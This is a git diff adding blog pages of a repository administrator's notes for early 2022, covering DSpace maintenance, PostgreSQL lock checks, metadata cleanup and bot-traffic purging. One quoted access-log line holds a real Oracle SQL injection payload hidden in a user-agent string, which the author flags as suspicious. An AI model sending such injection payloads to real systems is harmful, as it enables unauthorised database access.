+<li>Now it has worked and the message is &ldquo;Successfully updated OAI registration database to status COMPLIANT.&rdquo;</li>
+<li>I received an email (as the Admin contact on our OAI) that says:</li>
+</ul>
+</li>
+</ul>
+<blockquote>
+<p>Your repository has been registered in the OAI database of conforming repositories.</p>
+</blockquote>
+<ul>
+<li>Now I&rsquo;m taking a screenshot of the validation page for posterity, because the logs seem to go away after some time</li>
+</ul>
+<p><img src="/cgspace-notes/2022/01/openarchives-registration.png" alt="OpenArchives.org registration"></p>
+<ul>
+<li>I tried to re-build the Docker image for OpenRXV and got an error in the backend:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
+</span></span><span style="display:flex;"><span>&gt; openrxv-backend@0.0.1 build
+</span></span><span style="display:flex;"><span>&gt; nest build
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
+</span></span><span style="display:flex;"><span>                 ~~~~~~~~~~~~~~~~~~~~~
+</span></span><span style="display:flex;"><span>node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
+</span></span><span style="display:flex;"><span>                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
+</span></span></code></pre></div><ul>
+<li>Ah, it seems the code on the server was slightly out of date
+<ul>
+<li>I checked out the latest master branch and it built</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-01-12">2022-01-12</h2>
+<ul>
+<li>Fix some citation formatting issues in Gaia&rsquo;s <a href="https://dspacetest.cgiar.org/handle/10568/115230">eighteen CAS Green Cover publications on DSpace Test</a></li>
+</ul>
+<h2 id="2022-01-19">2022-01-19</h2>
+<ul>
+<li>Francesca was having issues with a submission on CGSpace this week
+<ul>
+<li>I checked and see a lot of locks in PostgreSQL:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>      1 
+</span></span><span style="display:flex;"><span>      1 ------------------
+</span></span><span style="display:flex;"><span>      1 (3506 rows)
+</span></span><span style="display:flex;"><span>      1  application_name 
+</span></span><span style="display:flex;"><span>      9  psql
+</span></span><span style="display:flex;"><span>     10  
+</span></span><span style="display:flex;"><span>   3487  dspaceWeb
+</span></span></code></pre></div><ul>
+<li>As before, I see messages from PostgreSQL about processes waiting for locks since I enabled the <code>log_lock_waits</code> setting last month:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
+</span></span><span style="display:flex;"><span>12
+</span></span></code></pre></div><ul>
+<li>I set a system alert on DSpace and then restarted the server</li>
+</ul>
+<h2 id="2022-01-20">2022-01-20</h2>
+<ul>
+<li>Abenet gave me a thumbs up for Gaia&rsquo;s eighteen CAS Green Cover items from last month
+<ul>
+<li>I created a SimpleArchiveFormat bundle with SAFBuilder and then imported them on CGSpace:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-01-20-green-covers.map
+</span></span></code></pre></div><h2 id="2022-01-21">2022-01-21</h2>
+<ul>
+<li>Start working on the rest of the ~980 CGIAR TAC and ICW documents from Gaia
+<ul>
+<li>I did some cleanups and standardization of author names</li>
+<li>I also noticed that a few dozen items had no dates at all, so I checked the PDFs and found dates for them in the text</li>
+<li>Otherwise all items have only a year, which is not great&hellip;</li>
+</ul>
+</li>
+<li>Proof of concept upgrade of OpenRXV from Angular 9 to Angular 10
+<ul>
+<li>I did some basic tests and created a <a href="https://github.com/ilri/OpenRXV/pull/128">pull request</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-01-22">2022-01-22</h2>
+<ul>
+<li>Spend some time adding months to the CGIAR TAC and IWC records from Gaia
+<ul>
+<li>Most of the PDFs have only YYYY, so this is annoying&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-01-23">2022-01-23</h2>
+<ul>
+<li>Finalize cleaning up the dates on the CGIAR TAC and IWC records from Gaia</li>
+<li>Rebuild AReS and start a fresh harvest</li>
+</ul>
+<h2 id="2022-01-25">2022-01-25</h2>
+<ul>
+<li>Help Udana from IWMI answer some questions about licenses on their journal articles
+<ul>
+<li>I was surprised to see they have 921 total, but only about 200 have a <code>dcterms.license</code> field</li>
+<li>I updated about thirty manually, but really Udana should do more&hellip;</li>
+</ul>
+</li>
+<li>Normalize the metadata <code>text_lang</code> attributes on CGSpace database:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+</span></span><span style="display:flex;"><span> text_lang |  count  
+</span></span><span style="display:flex;"><span>-----------+---------
+</span></span><span style="display:flex;"><span> en_US     | 2803350
+</span></span><span style="display:flex;"><span> en        |    6232
+</span></span><span style="display:flex;"><span>           |    3200
+</span></span><span style="display:flex;"><span> fr        |       2
+</span></span><span style="display:flex;"><span> vn        |       2
+</span></span><span style="display:flex;"><span> 92        |       1
+</span></span><span style="display:flex;"><span> sp        |       1
+</span></span><span style="display:flex;"><span>           |       0
+</span></span><span style="display:flex;"><span>(8 rows)
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;92&#39;, &#39;&#39;);
+</span></span><span style="display:flex;"><span>UPDATE 9433
+</span></span></code></pre></div><ul>
+<li>Then export the WLE Journal Articles collection again so there are fewer columns to mess with</li>
+</ul>
+<h2 id="2022-01-26">2022-01-26</h2>
+<ul>
+<li>Send Gaia an example of the duplicate report for the first 200 TAC items to see what she thinks</li>
+</ul>
+<h2 id="2022-01-27">2022-01-27</h2>
+<ul>
+<li>Work on WLE&rsquo;s Journal Articles a bit more
+<ul>
+<li>I realized that ~130 items have DOIs in their citation, but no <code>cg.identifier.doi</code> field</li>
+<li>I used this OpenRefine GREL to copy them:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.split(&#34;doi: &#34;)[1]
+</code></pre><ul>
+<li>I also spent a bit of time cleaning up ILRI Journal Articles, but I notice that we don&rsquo;t put DOIs in the citation so it&rsquo;s not possible to fix items that are missing DOIs that way
+<ul>
+<li>And I cleaned up and normalized some licenses</li>
+</ul>
+</li>
+<li>Francesca from Bioversity was having issues with a submission on CGSpace again
+<ul>
+<li>I looked at PostgreSQL and see an increasing number of locks:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
+</span></span><span style="display:flex;"><span>      1 
+</span></span><span style="display:flex;"><span>      1 ------------------
+</span></span><span style="display:flex;"><span>      1 (537 rows)
+</span></span><span style="display:flex;"><span>      1  application_name 
+</span></span><span style="display:flex;"><span>      9  psql
+</span></span><span style="display:flex;"><span>     51  dspaceApi
+</span></span><span style="display:flex;"><span>    477  dspaceWeb
+</span></span><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
+</span></span><span style="display:flex;"><span>3
+</span></span></code></pre></div><ul>
+<li>I set a system alert on CGSpace and then restarted Tomcat and PostgreSQL
+<ul>
+<li>The issue in Francesca&rsquo;s case was actually that someone had taken the task, not that PostgreSQL transactions were locked!</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-01-28">2022-01-28</h2>
+<ul>
+<li>Finalize the last ~100 WLE Journal Article items without licensese and DOIs
+<ul>
+<li>I did as many as I could, also updating http links to https for many journal links</li>
+</ul>
+</li>
+<li>Federica Bottamedi contacted us from the system office to say that she took over for Vini (Abhilasha Vaid)
+<ul>
+<li>She created an account on CGSpace and now we need to see which workflows she should belong to</li>
+</ul>
+</li>
+<li>Start a fresh harvesting on AReS</li>
+<li>I adjusted the <code>check-duplicates.py</code> script to write the output to a CSV file including the id, both titles, both dates, and the handle link
+<ul>
+<li>I included the id because I will need a unique field to join the resulting list of non-duplicates with the original CSV where the rest of the metadata and filenames are</li>
+<li>Since these items are not in DSpace yet, I generated simple numeric IDs in OpenRefine using this GREL transform: <code>row.index + 1</code></li>
+<li>Then I ran <code>check-duplicates.py</code> on items 1–200 and sent the resulting CSV to Gaia</li>
+</ul>
+</li>
+<li>Delete one duplicate item I saw in IITA&rsquo;s Journal Articles that was uploaded earlier in WLE
+<ul>
+<li>Also do some general cleanup on IITA&rsquo;s Journal Articles collection in OpenRefine</li>
+</ul>
+</li>
+<li>Delete one duplicate item I saw in ILRI&rsquo;s Journal Articles collection
+<ul>
+<li>Also do some general cleanup on ILRI&rsquo;s Journal Articles collection in OpenRefine and csv-metadata-quality</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-01-29">2022-01-29</h2>
+<ul>
+<li>I did some more cleanup on the ILRI Journal Articles
+<ul>
+<li>I added missing journal titles for items that had ISSNs</li>
+<li>Then I added pages for items that had them in the citation</li>
+<li>First, I faceted the citation field based on whether or not the item had something like &ldquo;: 232-234&rdquo; present:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.contains(/:\s?\d+(-|–)\d+/)
+</span></span></code></pre></div><ul>
+<li>Then I faceted by blank on <code>dcterms.extent</code> and did a transform to extract the page information for over 1,000 items!</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#39;p. &#39; +
+</span></span><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[0] +
+</span></span><span style="display:flex;"><span>&#39;-&#39; +
+</span></span><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|–)(\d+).*/)[2]
+</span></span></code></pre></div><ul>
+<li>Then I did similar for <code>cg.volume</code> and <code>cg.issue</code>, also based on the citation, for example to extract the &ldquo;16&rdquo; from &ldquo;Journal of Blah 16(1)&rdquo;, where &ldquo;16&rdquo; is the second capture group in a zero-based match:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
+</span></span></code></pre></div><ul>
+<li>This was 3,000 items so I imported the changes on CGSpace 1,000 at a time&hellip;</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2022-02/index.html b/docs/2022-02/index.html
new file mode 100644
index 000000000..8e991aec5
--- /dev/null
+++ b/docs/2022-02/index.html
@@ -0,0 +1,778 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="February, 2022" />
+<meta property="og:description" content="2022-02-01
+
+Meeting with Peter and Abenet about CGSpace in the One CGIAR
+
+We agreed to buy $5,000 worth of credits from Atmire for future upgrades
+We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization
+We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one
+We agreed to try to do more alignment of affiliations/funders with ROR
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2022-02/" />
+<meta property="article:published_time" content="2022-02-01T14:06:54+02:00" />
+<meta property="article:modified_time" content="2022-03-01T17:17:27+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="February, 2022"/>
+<meta name="twitter:description" content="2022-02-01
+
+Meeting with Peter and Abenet about CGSpace in the One CGIAR
+
+We agreed to buy $5,000 worth of credits from Atmire for future upgrades
+We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization
+We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one
+We agreed to try to do more alignment of affiliations/funders with ROR
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "February, 2022",
+  "url": "https://alanorth.github.io/cgspace-notes/2022-02/",
+  "wordCount": "3019",
+  "datePublished": "2022-02-01T14:06:54+02:00",
+  "dateModified": "2022-03-01T17:17:27+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2022-02/">
+
+    <title>February, 2022 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-02/">February, 2022</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2022-02-01T14:06:54+02:00">Tue Feb 01, 2022</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-02-01">2022-02-01</h2>
+<ul>
+<li>Meeting with Peter and Abenet about CGSpace in the One CGIAR
+<ul>
+<li>We agreed to buy $5,000 worth of credits from Atmire for future upgrades</li>
+<li>We agreed to move CRPs and non-CGIAR communities off the home page, as well as some other things for the CGIAR System Organization</li>
+<li>We agreed to make a Discovery facet for CGIAR Action Areas above the existing CGIAR Impact Areas one</li>
+<li>We agreed to try to do more alignment of affiliations/funders with ROR</li>
+</ul>
+</li>
+</ul>
+<ul>
+<li>I moved a bunch of communities:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115089
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115087
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/108598
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/1
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/35697 --child<span style="color:#f92672">=</span>10568/80211
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2517
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10947/2517
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/89416
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/3530
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80099
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80100
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/34494
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/114644
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/16573
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/42211
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/109945
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/16498
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/99453
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/2983
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/133
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/1208
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/1208
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/56924
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/56924
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/91688
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10568/91688
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2515
+</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10947/2515
+</span></span></code></pre></div><ul>
+<li>Remove CPWF and CTA subjects from the Discovery facets</li>
+<li>Start a full Discovery index on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    275m15.777s
+</span></span><span style="display:flex;"><span>user    182m52.171s
+</span></span><span style="display:flex;"><span>sys     2m51.573s
+</span></span></code></pre></div><ul>
+<li>I got a request to confirm validation of CGSpace on openarchives.org, with the requestor&rsquo;s IP being 128.84.116.66
+<ul>
+<li>That is at Cornell&hellip; hmmmm who could that be?!</li>
+<li>Oh, the OpenArchives initiative is at Cornell&hellip; maybe this is an automated periodic check?</li>
+</ul>
+</li>
+</ul>
+<h2 id="2022-02-02">2022-02-02</h2>
+<ul>
+<li>Looking at the top user agents and IP addresses in CGSpace&rsquo;s Solr statistics for 2022-01
+<ul>
+<li>64.39.98.40 made 26,000 requests, owned by Qualys so it&rsquo;s some kind of security scanning</li>
+<li>45.134.26.171 made 8,000 requests and it&rsquo;s own by some Russian company and makes requests like this hmmmmm:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] &#34;GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1&#34; 200 1157807 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf&#34; &#34;Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917&#34;
+</span></span></code></pre></div><ul>
+<li>3.225.28.105 made 3,000 requests mostly for one CIAT collection on the REST API and it is owned by Amazon
+<ul>
+<li>The user agent is sometimes a normal user one, and sometimes <code>Apache-HttpClient/4.3.4 (java 1.5)</code></li>
+</ul>
+</li>
+<li>217.182.21.193 made 2,400 requests and is on OVH</li>
+<li>I purged these hits</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+</span></span><span style="display:flex;"><span>Purging 26817 hits from 64.39.98.40 in statistics
+</span></span><span style="display:flex;"><span>Purging 9446 hits from 45.134.26.171 in statistics
+</span></span><span style="display:flex;"><span>Purging 6490 hits from 3.225.28.105 in statistics
+</span></span><span style="display:flex;"><span>Purging 11949 hits from 217.182.21.193 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 54702
+</span></span></code></pre></div><ul>
+<li>Export donors and affiliations from CGSpace database:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 1036
+</span></span><span style="display:flex;"><span>localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 7901
+</span></span></code></pre></div><ul>
+<li>Then check matches against the latest ROR dump:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> &gt; /tmp/2022-02-02-donors.txt
+</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
+</span></span><span style="display:flex;"><span>...
+</span></span></code></pre></div><ul>
+<li>I see we have 258/1036 (24.9%) of our donors matching ROR (as of the 2021-09-23 ROR dump)</li>
+<li>I see we have 1986/7901 (25.1%) of our affiliations matching ROR (as of the 2021-09-23 ROR dump)</li>
